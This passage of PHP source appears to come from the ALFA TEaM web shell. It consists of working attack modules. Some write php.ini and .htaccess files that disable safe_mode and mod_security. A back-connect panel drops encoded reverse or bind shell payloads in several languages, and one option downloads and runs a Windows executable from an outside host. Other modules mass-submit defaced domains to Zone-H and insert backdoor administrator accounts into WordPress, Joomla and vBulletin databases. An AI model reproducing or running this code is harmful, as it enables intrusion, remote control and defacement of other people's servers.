3694@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
3695echo '<center><b><big> php.ini created...!</center></b></big>';
3696}
3697if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
3698@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
3699echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
3700}
3701echo "<br></div>";
3702alfafooter();
3703}
3704function __get_resource($content){
3705return @gzinflate(__ZGVjb2Rlcg($content));
3706}
3707function __write_file($file, $content){
3708if($fh = @fopen($file, "wb")){
3709if(fwrite($fh, $content)!==false) return true;
3710}
3711return false;
3712}
3713function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
3714$res = "<font color='green'>[ Success...! ]</font>";
3715$err = "<font color='red'>[ Failed...! ]</font>";
3716if($evalOptions!="") $evalOptions = $evalOptions." ";
3717if($evalArguments!="") $evalArguments = " ".$evalArguments;
3718if($evalType=="c"){
3719$tmpdir = ALFA_TEMPDIR;
3720chdir($tmpdir);
3721if(is_writable($tmpdir)){
3722$uniq = substr(md5(time()),0,8);
3723$filename = $evalType.$uniq.".c";
3724$path = $filename;
3725if(__write_file($path, $evalCode)){
3726$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
3727$pathres = $filename.$ext;
3728$evalOptions = "-o ".$pathres." ".$evalOptions;
3729$cmd = "gcc ".$evalOptions.$path;
3730alfaEx($cmd);
3731if(is_file($pathres)){
3732if(chmod($pathres, 0755)){
3733$cmd = $pathres.$evalArguments;
3734alfaEx($cmd);
3735}else{$res = $err;}
3736unlink($pathres);
3737}else{$res = $err;}
3738unlink($path);
3739}else{$res = $err;}
3740}
3741return $res;
3742}elseif($evalType=="java"){
3743$tmpdir = ALFA_TEMPDIR;
3744chdir($tmpdir);
3745if(is_writable($tmpdir)){
3746if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
3747$classname = trim($r[1]);
3748$filename = $classname;
3749}else{
3750$uniq = substr(md5(time()),0,8);
3751$filename = $evalType.$uniq;
3752$evalCode = "class ".$filename." { ".$evalCode . " } ";
3753}
3754$path = $filename.".java";
3755if(__write_file($path, $evalCode)){
3756$cmd = "javac ".$evalOptions.$path;
3757alfaEx($cmd);
3758$pathres = $filename.".class";
3759if(is_file($pathres)){
3760if(chmod($pathres, 0755)){
3761$cmd = "java ".$filename.$evalArguments;
3762alfaEx($cmd);
3763}else{$res = $err;}
3764unlink($pathres);
3765}else{$res = $err;}
3766unlink($path);
3767}else{$res = $err;}
3768}
3769return $res;
3770}
3771return false;
3772}
3773function alfaconnect(){
3774alfahead();
3775$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
3776$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
3777$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
3778$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
3779$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
3780$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
3781$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
3782echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
3783echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
3784<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
3785$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
3786foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
3787echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
3788if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
3789$lang = $_POST['alfa1'];
3790$ip = $_POST['alfa2'];
3791$port = $_POST['alfa3'];
3792$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
3793$tmpdir = ALFA_TEMPDIR;
3794$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
3795$allow = array('perl','ruby','python','node');
3796eval('$lan=$'.$lang.';');
3797if(in_array($lang,$allow)){
3798if(__write_file($name,__get_resource($lan))){
3799if(_alfa_can_runCommand(true,true)){
3800$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
3801$out = alfaEx("$lang $name $arg $os");
3802if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
3803echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
3804}
3805}else{
3806echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
3807}
3808}
3809if($lang=='java'||$lang=='c'){
3810$code = __get_resource($lan);
3811$out = nl2br(bcinit($lang, $code,'',''));
3812echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
3813}
3814if($lang=='bcwin'){
3815$alfa = new AlfaCURL();
3816$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
3817$tmpdir = ALFA_TEMPDIR;
3818$f = @fopen($tmpdir.'/bcwin.exe','w+');
3819@fwrite($f, $s);
3820@fclose($f);
3821$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
3822}
3823if($lang=='php'){
3824echo "<pre class=ml1 style='margin-top:5px'>";
3825$code = __get_resource($lan);
3826if($code!==false){
3827$code = "\$target = \"".$arg."\";\n".$code;
3828eval($code);
3829echo("<center><font color='green'>[ Finished...! ]</font></center>");
3830}
3831echo "</pre>";
3832}
3833}
3834echo "</div>";
3835alfafooter();
3836}
3837function alfazoneh(){
3838alfahead();
3839echo '<div class=header>';
3840if(!function_exists('curl_version')){
3841echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
3842}
3843$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
3844$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
3845echo '
3846<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
3847<form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
3848<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
3849<br>
3850<select id="text" name="hackmode" style="width:400px;">';
3851$x=1;
3852foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
3853echo '</select><br><select id="text" name="reason" style="width:200px;">';
3854$x=1;
3855foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
3856echo '</select><br>
3857<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
3858<p><input type="submit" value=" " name="go" /></p>
3859</form></center>';
3860if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
3861ob_start();
3862$hacker = $_POST['alfa1'];
3863$method = $_POST['alfa2'];
3864$neden = $_POST['alfa3'];
3865$site = $_POST['alfa4'];
3866if(empty($hacker)){
3867die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
3868}elseif($method == "------------------------------------SELECT-------------------------------------"){
3869die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
3870}elseif($neden == "------------------------------------SELECT-------------------------------------"){
3871die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
3872}elseif(empty($site)){
3873die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
3874}
3875$i = 0;
3876$sites = explode("\n", $site);
3877$alfa = new AlfaCURL();
3878while($i < count($sites)){
3879if(substr($sites[$i], 0, 4) != "http"){
3880$sites[$i] = "http://".$sites[$i];
3881}
3882$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
3883++$i;
3884}
3885echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
3886}
3887echo "</div>";
3888alfafooter();
3889}
3890function alfapwchanger(){
3891alfahead();
3892
3893echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
3894<center><h3>';
3895$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
3896Alfa_Create_A_Tag('pwchanger',$vals);
3897echo '</h3></center>';
3898if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
3899
3900echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
3901<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
3902$table = array('td1' =>
3903 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
3904 'td2' =>
3905 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
3906 'td3' =>
3907 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
3908 'td4' =>
3909 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
3910 'td5' =>
3911 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
3912 'td6' =>
3913 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
3914 'td7' =>
3915 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
3916 'td8' =>
3917 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
3918);
3919create_table($table);
3920echo '<p><input value=" " name="send" type="submit"></p></form>';
3921if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
3922$localhost = $_POST['alfa3'];
3923$database = $_POST['alfa4'];
3924$username = $_POST['alfa5'];
3925$password = $_POST['alfa6'];
3926$admin = $_POST['alfa8'];
3927$SQL = $_POST['alfa9'];
3928$prefix = $_POST['alfa10'];
3929$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
3930$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
3931$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
3932$sole = @mysqli_num_rows($solevisible);
3933if ($sole == 1){
3934$solevis = @mysqli_fetch_assoc($solevisible);
3935$res = $solevis['ID'];
3936}
3937$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
3938if($solevisible){
3939__alert('Success... '.$admin.' is created...');}
3940}
3941}
3942if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
3943
3944echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
3945$table = array('td1' =>
3946 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
3947 'td2' =>
3948 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
3949 'td3' =>
3950 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
3951 'td4' =>
3952 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
3953 'td5' =>
3954 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
3955 'td6' =>
3956 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
3957 'td7' =>
3958 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
3959 'td8' =>
3960 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
3961);
3962create_table($table);
3963echo '<p><input value=" " name="send" type="submit"></p></form></center>';
3964if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
3965$localhost = $_POST['alfa3'];
3966$database = $_POST['alfa4'];
3967$username = $_POST['alfa5'];
3968$password = $_POST['alfa6'];
3969$admin = $_POST['alfa8'];
3970$SQL = $_POST['alfa9'];
3971$prefix = $_POST['alfa10'];
3972$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
3973$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
3974$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
3975$sole =@mysqli_num_rows($solevisible);
3976if ($sole == 1){
3977$solevis =@mysqli_fetch_assoc($solevisible);
3978$res = $solevis['id'];
3979}
3980$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
3981if($solevisible){
3982__alert('Success... '.$admin.' is created...');}
3983}
3984}
3985if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
3986
3987echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
3988$table = array('td1' =>
3989 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
3990 'td2' =>
3991 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
3992 'td3' =>
3993 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
3994 'td4' =>
3995 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
3996 'td5' =>
3997 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
3998 'td6' =>
3999 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4000 'td7' =>
4001 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4002 'td8' =>
4003 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4004);
4005create_table($table);
4006echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4007if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4008$localhost = $_POST['alfa2'];
4009$database = $_POST['alfa3'];
4010$username = $_POST['alfa5'];
4011$password = $_POST['alfa6'];
4012$prefix = $_POST['alfa7'];
4013$admin = $_POST['alfa8'];
4014$SQL = $_POST['alfa9'];
4015$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_connect_error());
4016$pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'");
4017$pw_col = @mysqli_num_rows($pw_col);
